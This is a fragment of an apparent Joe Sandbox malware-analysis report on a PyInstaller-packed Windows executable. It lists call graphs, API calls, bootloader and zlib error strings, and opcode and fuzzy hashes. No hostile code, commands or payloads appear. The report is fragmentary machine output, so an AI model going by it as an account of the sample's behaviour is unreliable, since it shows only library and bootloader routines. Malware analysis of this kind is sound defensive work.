17595->17609 17596->17609 17597->17609 17601 7ff7b1102884 38 API calls 17598->17601 17598->17612 17599->17609 17603 7ff7b1104bb4 46 API calls 17600->17603 17600->17612 17601->17609 17602->17583 17604 7ff7b1104192 17602->17604 17603->17609 17607 7ff7b1104c78 37 API calls 17604->17607 17604->17612 17605 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17606 7ff7b110450a 17605->17606 17606->17539 17607->17609 17608 7ff7b1104ee0 45 API calls 17611 7ff7b11043fc 17608->17611 17609->17608 17609->17611 17609->17612 17610 7ff7b110f5a8 46 API calls 17610->17611 17611->17610 17611->17612 17612->17605 17691 7ff7b11016e8 17613->17691 17617 
7ff7b110489e 17616->17617 17618 7ff7b11012a0 12 API calls 17617->17618 17619 7ff7b11048ee 17618->17619 17620 7ff7b110f110 46 API calls 17619->17620 17621 7ff7b11049c1 17620->17621 17622 7ff7b1104ee0 45 API calls 17621->17622 17623 7ff7b11049e3 17621->17623 17622->17623 17624 7ff7b1104ee0 45 API calls 17623->17624 17625 7ff7b1104a71 17623->17625 17624->17625 17625->17572 17628 7ff7b1104be9 17626->17628 17627 7ff7b1104c2e 17627->17572 17628->17627 17629 7ff7b1104c07 17628->17629 17630 7ff7b1104ee0 45 API calls 17628->17630 17631 7ff7b110f5a8 46 API calls 17629->17631 17630->17629 17631->17627 17633 7ff7b11024a7 17632->17633 17634 7ff7b11024d6 17633->17634 17636 7ff7b1102593 17633->17636 17638 7ff7b1102513 17634->17638 17669 7ff7b1101348 17634->17669 17637 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17636->17637 17637->17638 17638->17572 17640 7ff7b1102097 17639->17640 17641 7ff7b11020c6 17640->17641 17643 7ff7b1102183 17640->17643 17642 7ff7b1101348 12 API calls 17641->17642 17645 7ff7b1102103 17641->17645 17642->17645 17644 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17643->17644 17644->17645 17645->17572 17647 7ff7b1104e0f 17646->17647 17649 7ff7b1104e13 __crtLCMapStringW 17647->17649 17677 7ff7b1104e68 17647->17677 17649->17572 17651 7ff7b11028b7 17650->17651 17652 7ff7b11028e6 17651->17652 17655 7ff7b11029a3 17651->17655 17653 7ff7b1102923 17652->17653 17654 7ff7b1101348 12 API calls 17652->17654 17653->17572 17654->17653 17656 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17655->17656 17656->17653 17659 7ff7b110f5d9 17657->17659 17666 7ff7b110f5e7 17657->17666 17658 7ff7b110f607 17661 7ff7b110f618 17658->17661 17662 7ff7b110f63f 17658->17662 17659->17658 17660 7ff7b1104ee0 45 API calls 17659->17660 17659->17666 17660->17658 17681 7ff7b1111060 17661->17681 17664 7ff7b110f669 17662->17664 17665 7ff7b110f6ca 17662->17665 17662->17666 17664->17666 17684 7ff7b11101e0 17664->17684 17667 7ff7b11101e0 _fread_nolock MultiByteToWideChar 17665->17667 

Control-flow Graph (function starting at 7ff7b1116950; legend: • Executed, • Not Executed; graph rendering omitted)
                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116995
                                                              • Part of subcall function 00007FF7B11162E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B11162FC
                                                              • Part of subcall function 00007FF7B110B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B502
                                                              • Part of subcall function 00007FF7B110B4EC: GetLastError.KERNEL32(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B50C
                                                              • Part of subcall function 00007FF7B110B4A4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7B110B483,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110B4AD
                                                              • Part of subcall function 00007FF7B110B4A4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7B110B483,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110B4D2
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116984
                                                              • Part of subcall function 00007FF7B1116348: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B111635C
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116BFA
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116C0B
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116C1C
                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B1116E5C), ref: 00007FF7B1116C43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 1458651798-239921721
                                                            • Opcode ID: 6ec15ad00ebc81b5713ed5170bbebc68efdd6324f1cef62f169a4dbf8db42b45
                                                            • Instruction ID: be850a169b4cf009b79b9eed8e0d770ae8aab0cf33f143d68deb0cf23adee037
                                                            • Opcode Fuzzy Hash: 6ec15ad00ebc81b5713ed5170bbebc68efdd6324f1cef62f169a4dbf8db42b45
                                                            • Instruction Fuzzy Hash: 82D1B326A0825A86E720BF29F8401B9E751EF66788FC28135DB4D4368DDFFDE461C360

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 444 7ff7b111789c-7ff7b111790f call 7ff7b11175d0 447 7ff7b1117929-7ff7b1117933 call 7ff7b1108a14 444->447 448 7ff7b1117911-7ff7b111791a call 7ff7b1105a84 444->448 454 7ff7b111794e-7ff7b11179b7 CreateFileW 447->454 455 7ff7b1117935-7ff7b111794c call 7ff7b1105a84 call 7ff7b1105aa4 447->455 453 7ff7b111791d-7ff7b1117924 call 7ff7b1105aa4 448->453 471 7ff7b1117c6a-7ff7b1117c8a 453->471 456 7ff7b11179b9-7ff7b11179bf 454->456 457 7ff7b1117a34-7ff7b1117a3f GetFileType 454->457 455->453 460 7ff7b1117a01-7ff7b1117a2f GetLastError call 7ff7b1105a18 456->460 461 7ff7b11179c1-7ff7b11179c5 456->461 463 7ff7b1117a41-7ff7b1117a7c GetLastError call 7ff7b1105a18 CloseHandle 457->463 464 7ff7b1117a92-7ff7b1117a99 457->464 460->453 461->460 469 7ff7b11179c7-7ff7b11179ff CreateFileW 461->469 463->453 479 7ff7b1117a82-7ff7b1117a8d call 7ff7b1105aa4 463->479 467 7ff7b1117a9b-7ff7b1117a9f 464->467 468 7ff7b1117aa1-7ff7b1117aa4 464->468 474 7ff7b1117aaa-7ff7b1117aff call 7ff7b110892c 467->474 468->474 475 7ff7b1117aa6 468->475 469->457 469->460 482 7ff7b1117b1e-7ff7b1117b4f call 7ff7b1117350 474->482 483 7ff7b1117b01-7ff7b1117b0d call 7ff7b11177d8 474->483 475->474 479->453 489 7ff7b1117b51-7ff7b1117b53 482->489 490 7ff7b1117b55-7ff7b1117b97 482->490 483->482 491 7ff7b1117b0f 483->491 492 7ff7b1117b11-7ff7b1117b19 call 7ff7b110b664 489->492 493 7ff7b1117bb9-7ff7b1117bc4 490->493 494 7ff7b1117b99-7ff7b1117b9d 490->494 491->492 492->471 496 7ff7b1117c68 493->496 497 7ff7b1117bca-7ff7b1117bce 493->497 494->493 495 7ff7b1117b9f-7ff7b1117bb4 494->495 495->493 496->471 497->496 499 7ff7b1117bd4-7ff7b1117c19 CloseHandle CreateFileW 497->499 501 7ff7b1117c1b-7ff7b1117c49 GetLastError call 7ff7b1105a18 call 7ff7b1108b54 499->501 502 7ff7b1117c4e-7ff7b1117c63 499->502 501->502 502->496
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: ed7bb29f19db96d6df9cef71716606d4f492670f90b16f42eaf9bff86babf69b
                                                            • Instruction ID: 97513c9bdb08f839a52f68d8f9157e6e44d947a924116ff848c4efd0edd3ec4a
                                                            • Opcode Fuzzy Hash: ed7bb29f19db96d6df9cef71716606d4f492670f90b16f42eaf9bff86babf69b
                                                            • Instruction Fuzzy Hash: 6BC1F733B14A4A85EB10EF68E4802ACB761FB5ABACB550235DF1E57398DF78D165C320

                                                            Control-flow Graph

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF7B10F153F), ref: 00007FF7B10F79E7
                                                              • Part of subcall function 00007FF7B10F7B60: GetEnvironmentVariableW.KERNEL32(00007FF7B10F39FF), ref: 00007FF7B10F7B9A
                                                              • Part of subcall function 00007FF7B10F7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7B10F7BB7
                                                              • Part of subcall function 00007FF7B11083CC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B11083E5
                                                            • SetEnvironmentVariableW.KERNEL32 ref: 00007FF7B10F7AA1
                                                              • Part of subcall function 00007FF7B10F2B10: MessageBoxW.USER32 ref: 00007FF7B10F2BE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                            • API String ID: 3752271684-1116378104
                                                            • Opcode ID: 8a0f81467077cc4c225813434d72b9cad563560c0a92c7b3ae5d3c4c9c93026c
                                                            • Instruction ID: 3827fa51e6641949668722213c07c465d95a9f8ea32380595bbf08ec77ce77be
                                                            • Opcode Fuzzy Hash: 8a0f81467077cc4c225813434d72b9cad563560c0a92c7b3ae5d3c4c9c93026c
                                                            • Instruction Fuzzy Hash: 04517F11F0D21B40FB54B62E68662BED3519FA7BC8FD45031EF0E8B69EDDACE4018661
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                            • API String ID: 0-2665694366
                                                            • Opcode ID: 212d86a86c8cb6d9fc903fcdabd382662a83ce4cb1445b9d6573bc2018cf14a4
                                                            • Instruction ID: 1145ce095fe2ede5bdd21c06c4cab6f6031074d13bb2baba8bd6cd49e2a029b1
                                                            • Opcode Fuzzy Hash: 212d86a86c8cb6d9fc903fcdabd382662a83ce4cb1445b9d6573bc2018cf14a4
                                                            • Instruction Fuzzy Hash: 79523672A142A68BE7949F18C499B7E7BE9FB56304F814138E74A877C4DBBCD804CB50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 953 7ff7b1116bcc-7ff7b1116c01 call 7ff7b11162d8 call 7ff7b11162e0 call 7ff7b1116348 960 7ff7b1116c07-7ff7b1116c12 call 7ff7b11162e8 953->960 961 7ff7b1116d3f-7ff7b1116dad call 7ff7b110b4a4 call 7ff7b11121c8 953->961 960->961 966 7ff7b1116c18-7ff7b1116c23 call 7ff7b1116318 960->966 973 7ff7b1116dbb-7ff7b1116dbe 961->973 974 7ff7b1116daf-7ff7b1116db6 961->974 966->961 972 7ff7b1116c29-7ff7b1116c4c call 7ff7b110b4ec GetTimeZoneInformation 966->972 984 7ff7b1116c52-7ff7b1116c73 972->984 985 7ff7b1116d14-7ff7b1116d3e call 7ff7b11162d0 call 7ff7b11162c0 call 7ff7b11162c8 972->985 976 7ff7b1116dc0 973->976 977 7ff7b1116df5-7ff7b1116e08 call 7ff7b110e19c 973->977 978 7ff7b1116e4b-7ff7b1116e4e 974->978 979 7ff7b1116dc3 976->979 989 7ff7b1116e0a 977->989 990 7ff7b1116e13-7ff7b1116e2e call 7ff7b11121c8 977->990 978->979 980 7ff7b1116e54-7ff7b1116e5c call 7ff7b1116950 978->980 986 7ff7b1116dc8-7ff7b1116df4 call 7ff7b110b4ec call 7ff7b10fbe00 979->986 987 7ff7b1116dc3 call 7ff7b1116bcc 979->987 980->986 992 7ff7b1116c7e-7ff7b1116c85 984->992 993 7ff7b1116c75-7ff7b1116c7b 984->993 987->986 996 7ff7b1116e0c-7ff7b1116e11 call 7ff7b110b4ec 989->996 1011 7ff7b1116e30-7ff7b1116e33 990->1011 1012 7ff7b1116e35-7ff7b1116e47 call 7ff7b110b4ec 990->1012 998 7ff7b1116c87-7ff7b1116c8f 992->998 999 7ff7b1116c99 992->999 993->992 996->976 998->999 1005 7ff7b1116c91-7ff7b1116c97 998->1005 1007 7ff7b1116c9b-7ff7b1116d0f call 7ff7b111b380 * 4 call 7ff7b11137ac call 7ff7b1116e64 * 2 999->1007 1005->1007 1007->985 1011->996 1012->978
                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116BFA
                                                              • Part of subcall function 00007FF7B1116348: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B111635C
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116C0B
                                                              • Part of subcall function 00007FF7B11162E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B11162FC
                                                            • _get_daylight.LIBCMT ref: 00007FF7B1116C1C
                                                              • Part of subcall function 00007FF7B1116318: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B111632C
                                                              • Part of subcall function 00007FF7B110B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B502
                                                              • Part of subcall function 00007FF7B110B4EC: GetLastError.KERNEL32(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B50C
                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B1116E5C), ref: 00007FF7B1116C43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 2248164782-239921721
                                                            • Opcode ID: 6e110c42c992c942a967616de5e9b20753deb8e2725d4993c570f78644da606e
                                                            • Instruction ID: e44b119ebb16b04f47defa949099dd43232c25e7ccba2d943f0214906946d449
                                                            • Opcode Fuzzy Hash: 6e110c42c992c942a967616de5e9b20753deb8e2725d4993c570f78644da606e
                                                            • Instruction Fuzzy Hash: E9518222A1864A86E710FF29F8805A9E760FB6A788FC24135DB4D4369DDFBDE450C760
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $header crc mismatch$unknown header flags set
                                                            • API String ID: 0-1127688429
                                                            • Opcode ID: 326cf6427d5bf0e9376a5910f25170e202e1497fb5a723acb88e47d2bece8f14
                                                            • Instruction ID: 70bbc82d1dbb2a18243c275b0a6a0e2e089b455c9ab5346b202724d93ea09c60
                                                            • Opcode Fuzzy Hash: 326cf6427d5bf0e9376a5910f25170e202e1497fb5a723acb88e47d2bece8f14
                                                            • Instruction Fuzzy Hash: 3AF1C362A083C58BE7A5AB18C0D9B3EBBA9FF56748F454534EB4907398CBB8D440DB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: incorrect header check$invalid window size
                                                            • API String ID: 0-900081337
                                                            • Opcode ID: eff0553be1f10ec537251e961509bf2a8d4d677e3d27bfe4c15f043eb5d22666
                                                            • Instruction ID: 48314f238ca81e7dfcc2c6ed45a1a6c496075cab30bd44f297fa2fbe67fc87b5
                                                            • Opcode Fuzzy Hash: eff0553be1f10ec537251e961509bf2a8d4d677e3d27bfe4c15f043eb5d22666
                                                            • Instruction Fuzzy Hash: 8B91DA72A182C587E7A4AB1CC4D9B3E7BA9FB66348F914139DB49467C8CB7CE540CB10

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ff7b10f1700-7ff7b10f1714 1 7ff7b10f1716-7ff7b10f172d call 7ff7b10f2b10 0->1 2 7ff7b10f172e-7ff7b10f1732 0->2 4 7ff7b10f1734-7ff7b10f173d call 7ff7b10f12a0 2->4 5 7ff7b10f1758-7ff7b10f177b call 7ff7b10f7c10 2->5 13 7ff7b10f174f-7ff7b10f1757 4->13 14 7ff7b10f173f-7ff7b10f174a call 7ff7b10f2b10 4->14 11 7ff7b10f177d-7ff7b10f17a8 call 7ff7b10f2870 5->11 12 7ff7b10f17a9-7ff7b10f17c4 call 7ff7b10f3fc0 5->12 20 7ff7b10f17c6-7ff7b10f17d9 call 7ff7b10f2b10 12->20 21 7ff7b10f17de-7ff7b10f17f1 call 7ff7b1100df4 12->21 14->13 26 7ff7b10f191f-7ff7b10f1922 call 7ff7b110076c 20->26 27 7ff7b10f1813-7ff7b10f1817 21->27 28 7ff7b10f17f3-7ff7b10f180e call 7ff7b10f2870 21->28 34 7ff7b10f1927-7ff7b10f193e 26->34 31 7ff7b10f1831-7ff7b10f1851 call 7ff7b1105570 27->31 32 7ff7b10f1819-7ff7b10f1825 call 7ff7b10f1050 27->32 37 7ff7b10f1917-7ff7b10f191a call 7ff7b110076c 28->37 41 7ff7b10f1853-7ff7b10f186d call 7ff7b10f2870 31->41 42 7ff7b10f1872-7ff7b10f1878 31->42 38 7ff7b10f182a-7ff7b10f182c 32->38 37->26 38->37 49 7ff7b10f190d-7ff7b10f1912 41->49 44 7ff7b10f1905-7ff7b10f1908 call 7ff7b110555c 42->44 45 7ff7b10f187e-7ff7b10f1887 42->45 44->49 48 7ff7b10f1890-7ff7b10f18b2 call 7ff7b1100abc 45->48 52 7ff7b10f18e5-7ff7b10f18ec 48->52 53 7ff7b10f18b4-7ff7b10f18cc call 7ff7b11011fc 48->53 49->37 55 7ff7b10f18f3-7ff7b10f18fb call 7ff7b10f2870 52->55 58 7ff7b10f18d5-7ff7b10f18e3 53->58 59 7ff7b10f18ce-7ff7b10f18d1 53->59 62 7ff7b10f1900 55->62 58->55 59->48 61 7ff7b10f18d3 59->61 61->62 62->44
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                            • API String ID: 2030045667-3833288071
                                                            • Opcode ID: 29aed41d898024d6afd6ca69df36de76f99c99904f7afb2ff6bbac2b69c01ca5
                                                            • Instruction ID: 8622e5fcdce3cbb96f275c66bcd52df25aa229fef8fb221393e17232e2dc802f
                                                            • Opcode Fuzzy Hash: 29aed41d898024d6afd6ca69df36de76f99c99904f7afb2ff6bbac2b69c01ca5
                                                            • Instruction Fuzzy Hash: 17519F21F0C64A82EB10BB1AE4912B9E391BF66BD8FC44031DF4C4769DEEBCE5558720

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _fread_nolock$Message
                                                            • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                            • API String ID: 677216364-1384898525
                                                            • Opcode ID: 88bd7f25ce49e1433e5172e6c1c51183f3bc6fb5d101781aad75366123237118
                                                            • Instruction ID: 07b4985e5a82e5f9c33369baeb20fc1da396e8cbb8fff9b45650b69b64f1d68a
                                                            • Opcode Fuzzy Hash: 88bd7f25ce49e1433e5172e6c1c51183f3bc6fb5d101781aad75366123237118
                                                            • Instruction Fuzzy Hash: D3519E71A0960AC2EB14EF1DE495278B3A0EB6AB98F918135DB0C8779DDEBCE440C754

                                                            Control-flow Graph

                                                            • Graph omitted (interactive rendering not recoverable); function entry 7ff7b10f1000, calls SetDllDirectoryW at 7ff7b10f3bce and subroutines 7ff7b10f3eb0, 7ff7b10f7b60, 7ff7b10f8970, 7ff7b10f2b10 (error path) before the child-process branch at 7ff7b10f3ce6
                                                            APIs
                                                              • Part of subcall function 00007FF7B10F3EB0: GetModuleFileNameW.KERNEL32(?,00007FF7B10F39CA), ref: 00007FF7B10F3EE1
                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF7B10F3BD5
                                                              • Part of subcall function 00007FF7B10F7B60: GetEnvironmentVariableW.KERNEL32(00007FF7B10F39FF), ref: 00007FF7B10F7B9A
                                                              • Part of subcall function 00007FF7B10F7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7B10F7BB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                            • API String ID: 2344891160-1544818733
                                                            • Opcode ID: 9142216fe1597e1c9e17d458b54f40fc9f4f49d9b38e9defbc386d8b2912fed3
